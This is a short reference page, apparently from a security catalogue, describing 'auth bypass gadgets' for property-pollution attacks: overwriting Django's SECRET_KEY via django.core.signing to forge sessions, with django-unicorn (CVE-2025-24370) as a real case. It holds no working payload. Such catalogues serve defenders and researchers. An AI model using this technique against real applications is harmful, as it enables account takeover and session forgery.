Auth Bypass Gadgets
Auth bypass gadgets let the attacker forge credentials, escalate privileges, or skip an access check. The most powerful variants overwrite a signing key, so the attacker can forge a session for any user without ever guessing a password.
Third-party packages
| Library |
Trigger |
Polluted property |
django.core.signing |
Signer.sign / Signer.unsign - covers session cookies, CSRF tokens, password-reset tokens |
django.conf.settings.SECRET_KEY |
Real-world cases
| Application |
Polluted property |
Mechanism |
CVE |
| django-unicorn |
django.conf.settings.SECRET_KEY |
WebSocket message via set_property_value |
CVE-2025-24370 |